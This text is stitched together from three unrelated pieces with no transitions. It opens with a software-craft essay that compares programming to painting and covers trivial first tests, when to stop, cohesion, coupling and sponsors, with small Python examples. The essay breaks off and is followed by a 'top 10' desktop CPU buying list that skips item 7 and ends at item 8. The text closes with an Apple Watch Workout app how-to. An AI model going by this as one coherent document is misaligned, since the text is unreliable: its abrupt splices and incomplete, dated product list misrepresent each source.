The advantage to starting with such a trivial test is that it helps fill in the blank canvas without facing the distraction of trying to write production code. By just writing this very simple test, you have to get a certain level of infrastructure in place and answer the dozen or so typical startup questions: What do I call it? Where do I put it in the development tree? You have to add it to version control, and possibly to the build and/or release procedures. Suddenly, a very simple test doesn’t look so simple any more. So ignore the exquisite logic of the routine you are about to write, and get the one-line test to compile and work first. Once that test passes, you can now proceed to fill in the canvas—it’s not blank anymore. You’re not writing anything from scratch, you’re just adding a few routines. . . .
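In Python’s unittest, for example, that nearly trivial first test might look like this (the class under test is invented for illustration):

```python
# The trivial first test: it does almost nothing, but writing it forces the
# module, the class, and the test harness into existence.
import unittest

class Account:
    """The class we haven't really written yet."""

class TestAccount(unittest.TestCase):
    def test_can_instantiate(self):
        # Nearly trivial on purpose: the canvas is no longer blank.
        self.assertIsNotNone(Account())

if __name__ == "__main__":
    unittest.main()
```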

2. When to Stop

We share another problem with painters: knowing when to stop. You don’t want to stop prematurely; the project won’t yet be finished.[3] But if you don’t stop in time, and keep adding to it unnecessarily, the painting becomes lost in the paint and is ruined.

We had a client once who seemed to have some difficulty in the definition of “done” with regard to code. After toiling for weeks and weeks on a moderately complex piece of software, Matthew (not his real name) proudly announced the Code Was Done. He went on to explain that it didn’t always produce the correct output. Oh, and every now and again, the code would crash for no apparent reason. But it’s done. Unfortunately, wishful thinking alone doesn’t help us get working software out to users.

It’s easy to err on the other side of the fence too—have you ever seen a developer make a career of one little module? Have you ever done that? It can happen for any number of political reasons (“I’m still working on XYZ, so you can’t reassign me yet”), or maybe we just fall in love with some particularly elegant bit of code. But instead of making the code better and better, we actually run a huge risk of ruining it completely. Every line of code not written is correct—or at least, guaranteed not to fail. Every line of code we write, well, there are no guarantees. Each extra line carries some risk of failure, carries an additional cost to maintain, document, and teach a newcomer. When you multiply it out, any bit of code that isn’t absolutely necessary incurs a shockingly large cost. Maybe enough to kill the project.

How then, can we tell when it’s time to stop?

Painting Murals

Knowing when to stop is especially hard when you can’t see the whole thing that you’re working on. Mural painting, for instance, takes a special eye. In corporate software development, you may only ever see the one little piece of detail that you’re working on. If you watch mural painters up close, it’s quite difficult to discern that the splash of paint they’re working on is someone’s hand, or eyeball. If you can’t see the big picture, you won’t be able to see how you fit in.

The opposite problem is even worse—suppose you’re the lone developer on a project of this size. Most muralists are simply painting walls, but anyone who’s ever painted their house can tell you that ceilings are a lot harder than walls, especially when the ceiling in question covers 5,000 square feet and you have to lie on your back 20 meters above the floor to paint it. So what did Michelangelo do when planning to paint the Sistine Chapel? The same thing you should do when faced with a big task.

Michelangelo divided his mural into panels: separate, free-standing areas, each of which tells a story. But he did so fairly carefully, such that the panels exhibit these characteristics:

  • High cohesion
  • Low coupling
  • Conceptual integrity

These are things we can learn from.

Cohesion

What is cohesion? As used here, cohesion refers to the panel’s focus and clarity of purpose. In the Sistine Chapel ceiling, each panel tells a single Old Testament story—completely, but without any extraneous elements.

In software, the Unix command line philosophy of small, sharp tools (“do one thing and do it well”) is one example. Each tool is narrowly focused on its primary task. Low cohesion occurs when you have giant “manager” classes that try to do too many disparate things at once.
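In code, the contrast might look like this small, invented sketch: one sharp function with a single job, next to the skeleton of a low-cohesion “manager” class:

```python
# High cohesion: one narrow job, done completely, with nothing extraneous.
def word_count(text: str) -> int:
    """Count the words in a string, and nothing else."""
    return len(text.split())

# Low cohesion: a grab-bag "manager" doing too many disparate things at once.
class ReportManager:
    def count_words(self, text: str) -> int: ...
    def connect_to_database(self, dsn: str) -> None: ...
    def send_email(self, to: str, body: str) -> None: ...
    def draw_chart(self, data: list) -> None: ...
```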

Coupling

Coupling is related to orthogonality[HT00]: unrelated things should remain, well, unrelated. Following the object-oriented principle of encapsulation helps to prevent unintended coupling, but there are still other ways to fall into the coupling trap. Michelangelo’s panels have low coupling; they are all self-contained; there are no instances of figures reaching from one panel into the next, for instance. Why is that important?

If you look closely at one of the panels that portrays angels gliding about the firmament of heaven, you’ll notice that one of the angels is turning his back to, and gliding away from, the other angels. You’ll also notice that said angel isn’t wearing any pants. He’s rather pointedly “mooning” the other angels.

There is surely a tale that explains the bare tail of the mooning angel, but for now let’s assume that the Pope discovered the mooning angel and demanded that it be replaced. If the panels weren’t independent, then the replacement of one panel would entail replacing some adjacent panels as well—and if you had to use different pigments because the originals weren’t available, maybe you have to replace the next set of panels that were indirectly affected. Let the nightmare begin. But as it stands, the panels are independent, so the offending angel (who was apparently on Spring Break) could have been easily replaced with a less caustic image and the rest of the project would remain unaffected.

Conceptual Integrity

But despite that independence, there is conceptual integrity—the style, the themes, the mood, tie it all together. In computer languages, Smalltalk has conceptual integrity, so does Ruby, so does C. C++ doesn’t: it tries to be too many things at once, so you get an awkward marriage of concepts that don’t really fit together well.

The trick then is to divide up your work while maintaining a holistic integrity; each Sistine Chapel panel is a separate piece of art, complete unto itself, but together they tell a coherent story.

For our projects, we have several techniques we need to use inside code, including modularity, decoupling, and orthogonality. At the project level, consider architecting the project as a collection of many small applications that work together. These interacting applications might communicate through a simple network connection or even flat files, or through a heavier-duty component technology such as Enterprise JavaBeans (EJB).

Time

Up until now, we’ve concentrated on splitting up a project in space, but there is another very important dimension that we need to touch on briefly—time. In the time dimension, you need to use iterations to split up a project.

Generally speaking, you don’t want to go more than a few weeks without a genuine deliverable. Longer than that introduces too large a feedback gap—you can’t get the feedback quickly enough to act on it. Iterations need to be short and regular in order to provide the most beneficial feedback.

The other important thing about iterations is that there is no such thing as 80% done. You can’t get 80% pregnant—it’s a Boolean condition. We want to get to the position where we only ship what really works, and have the team agree on the meaning of words like “done”. If a feature isn’t done, save it for the next iteration. As the iterations are short, that’s not too far off.

In time or space, feedback is critical. For individual pieces of code, it is vital to have competent unit tests that will provide that feedback. Beware of excuses such as “oh, that code’s too complicated to test.” If it’s too complicated to test, then it logically follows that the code is too complicated to write! If the code seems to be too complicated to test, that’s a warning sign that you have a poor design. Refactor the code in order to make it easy to test, and you’ll not only improve the feedback loop (and the future extensibility and maintainability of the system), you’ll improve the design of the system itself.
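As a small, invented illustration of that refactoring step, a calculation buried inside I/O can be extracted into a pure function that a unit test can reach directly:

```python
# Before: logic entangled with printing feels "too complicated to test".
def print_invoice_total(lines):
    print(f"Total: {sum(qty * price for qty, price in lines):.2f}")

# After: the calculation is a pure function with an obvious unit test,
# and the printing wrapper becomes trivial.
def invoice_total(lines) -> float:
    return sum(qty * price for qty, price in lines)

def test_invoice_total():
    assert invoice_total([(2, 1.50), (1, 3.00)]) == 6.00
```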

3. Satisfying the Sponsor

Now comes the hard part. So far, we’ve talked about problems that have simple, straightforward answers. Organize your system this way; always have good unit tests; look for and apply feedback to improve the code and the process; etc. But now we’re headed into much more uncertain terrain—dealing with people. In particular, dealing with the sponsor: the person or persons who are paying to make this project happen. They have goals and expectations all their own, and probably do not understand the technology with which we create the work. They may not know exactly what they want, but they want the project to come out perfect in the end.

This must be the artist’s worst nightmare. The person paying for the portrait is also sitting for it, and says simply “Make me Look Good”. The fact that the sitter is royalty who commands a well-oiled guillotine doesn’t help. Sounds pretty close to the position we find ourselves in as we write software, doesn’t it?

Let’s look at it from the sitter’s point of view. You commission an artist to paint you. What do you get? Perhaps a traditional, if somewhat flat looking portrait such as da Vinci’s Portrait of Ginevra de’ Benci in 1474. Or maybe the realistic, haunting face of Vermeer’s Girl With a Pearl Earring. How about the primitive (and topless) look of Matisse’s Seated Figure, the wild and fractured Portrait of Picasso by Juan Gris, or the stick-figured jumble of Paul Klee’s Captive?

All of these are portraits, all interpretations of a commonplace thing—a human face. All of them correctly implement the requirements, yet any of them might fail to satisfy the client.

Know the Best Computer Processors

What makes a processor great? Some say it’s how expensive it is, while others suggest it’s the number of cores or its overclockability that determines the quality of a CPU. In reality, it’s a matter of personal preference backed by some hard numbers.

You would likely be disappointed if you shelled out a small fortune just to build a machine that only ends up being used for typing up documents. Likewise, thinking you could save some money by skimping out on the CPU in your gaming rig would be an equally misguided decision.

Here are our picks for the top 10 best processors you can find right now for your desktop PC.

1. AMD A8-7670K

If you are an AMD enthusiast (or like rooting for the underdog), these are interesting times. AMD is about to launch a series of processors based on a new architecture (Zen) that it promises will obliterate the current generation of CPUs, so prices are falling accordingly. The A8-7670K remains one of the rare bright spots in AMD’s lineup despite being more than two years old.

It is built on a newer 28nm manufacturing process, which partly explains why it has a 95W TDP – thermal design power, or a part’s share of your power supply’s available watts – despite a relatively high base and turbo clock speed (3.6GHz and 3.9GHz). Its graphics performance is where it shines, thanks to an onboard GPU that is slightly more powerful than the Radeon R7 240 (six compute units, 384 shader cores, 757MHz GPU clock speed).

2. Intel Xeon E5-2670

One of the best kept secrets in the world of computer hardware is that, every now and then, data centers around the world, operated by some of the biggest tech companies in the world, dump hundreds, if not thousands of processors as they migrate to newer, faster and more power efficient models.

When that happens, they usually end up on eBay or on Amazon, where you can buy them for a fraction of their price (usually one tenth). The Sandy Bridge E5-2670 v1 is one of them; its second-hand price is one-tenth of its retail price. Grab a pair of them to construct a workstation rig that would put Intel’s current finest CPU to shame with a total of 16 cores, 32 threads and 40MB cache.

3. Intel Core i3-6100

If you want to do some heavy lifting but don’t want to blow your savings on a piece of silicon, then check out this chip. The Intel Core i3-6100 is the cheapest Core processor based on the new Skylake architecture, and you don’t have to fork out a fortune for it.

True, you’ll want to pair it with a motherboard with a decent chipset (Z170) in order to run faster memory (2.66GHz), but that isn’t strictly necessary. It is not a K-model, and there are two SKUs, the 6100 (higher TDP and higher clock speed) and the 6100T (lower TDP, lower clock speeds), so make sure you choose the right one.

Using a 14nm node, it reaches 3.7GHz with a 65W TDP; its dual-core/4-thread configuration should make for a decent gaming rig, and the 4K-capable Intel HD 530 GPU is clocked at 350MHz. Oh and it should make a fairly good overclocker as well.

4. AMD Sempron 3850

At the other end of the spectrum is the Sempron 3850, one of AMD’s cheapest quad-core processors. It sports a Kabini core and is built on a 28nm process, which explains why its TDP only reaches 25W, a small fraction of the FX-9590’s.

Obviously, the fact that it runs at only 1.3GHz also helps a lot. Add in the fact that it comes with an integrated AMD Radeon HD 8280 GPU (basic, but decent) and you get something that’s better than most Bay Trail-based systems at least. The best part, though, has to be the price: it is cheap, especially as it includes the heat sink and fan; that means you can envisage getting a motherboard bundle for less than Intel’s cheapest CPU. A shame that it has only one memory channel, though.

5. Intel Core i7-6700K

This is Skylake, Intel’s sixth Core generation. The i7-6700K, which costs just under $345 (£290, about AU$463), is the company’s most powerful Skylake model, set to replace the Broadwell-based desktop processors in the short term.

Here we’ve got a pretty powerful processor boasting four cores, eight threads, 8MB cache, a base clock speed of 4GHz, a turbo boost of 4.2GHz and an Intel HD Graphics 530 subsystem inside. Overclocking is what may get some of us excited, however, as it’s the distinguishing feature of “K” models such as this one.

Pair that with a decent 100-series chipset, an oversized HSF and a couple of overclocker-friendly DDR4 memory modules, and watch it fly. And, although you’ll want to pay close attention to that 91W TDP, 5.0GHz isn’t a lofty goal with the 6700K.

6. Intel Core i5-4690K

There is a good reason why the Intel Core i5-4690K is among the best-selling processors on Amazon.

This Devil’s Canyon part is one of the most, if not the most, affordable K-series processors from Intel’s Core range at $239 (£182, about AU$321) and as such can be overclocked fairly easily with modest effort. It has a base frequency of 3.5GHz, with many users reporting being able to hit a 25% increase in speed using a decent aftermarket HSF.

The 4690K doesn’t come with hyper-threading, but at this price it isn’t expected anyway. The processor, built on the 22nm fabrication process, packs 6MB of L3 cache, an 88W TDP and even an Intel HD Graphics 4600 onboard GPU.

8. AMD FX-8320E

Meet the AMD FX-8320E; this is one of the cheapest eight-core processors on the market and costs a smidgen under $110 (£108, about AU$148) on Amazon.

Built on a mature 32nm node, the FX-8320E unsurprisingly has a high TDP (95W). Then again, maybe that’s not an unusual spec given the 3.2GHz clock speed. Plus, when needed, it can even boost all the way to 4GHz.

Don’t get your hopes up too high, though. On most tasks, the FX-8320E will be outperformed even by a modest Haswell Core i3. Where it truly shines is when you throw multi-threaded jobs (encryption, encoding, etc.) at it, where it can beat even more expensive Core i5 parts. What’s more, many users have been able to overclock the chip easily using a non-stock heatsink fan, some all the way up to 4.8GHz.

Workout App on the Apple Watch

It’s time to exercise, and the Apple Watch can help you track your workout sessions. In this excerpt from Apple Watch, Jason Rich shows you how you can set a Caloric, Distance, or Time goal, and then have the watch display real-time data it collects as you pursue that goal during your workout.

The Workout app is somewhat similar to the Activity app, but instead of being designed for use at all times while you’re wearing the watch, this app allows you to collect and analyze data related to actual workouts.

To use this app, launch it from the Home screen of the Apple Watch (see Figure 5.23), and from the main menu, select the fitness-related activity you’re about to participate in. Options include Outdoor Walk, Outdoor Run, Outdoor Cycle, Indoor Run, Indoor Walk, Indoor Cycle, Elliptical, Rower, Stair Stepper, or Other.

Based on which option you select, for each workout, typically you can set a Caloric, Distance, or Time goal, and then have the watch display real-time data it collects as you pursue that goal during your workout.

When you’re ready to begin a workout, follow these steps to activate the Workout app on your watch:

    1. From any watch face you’ve selected to be displayed on the watch’s screen, press the Digital Crown to access the watch’s Home screen.
    2. Tap on the Workout app icon to launch the Workout app.
    3. When the main menu appears, tap on the type of workout you plan to engage in.
    4. Depending on the activity you select, a submenu screen enables you to Set Calories, Set Time, or Set Miles, or select Open (if you have no goal in mind, but simply want to track your workout-related data). If you select the Set Time screen, a timer appears, showing 0:00, with a negative sign (–) icon on the left and a plus sign (+) icon on the right. Tap the + icon to set the desired duration for your workout. Press the Start button, shown in Figure 5.24, to begin your workout.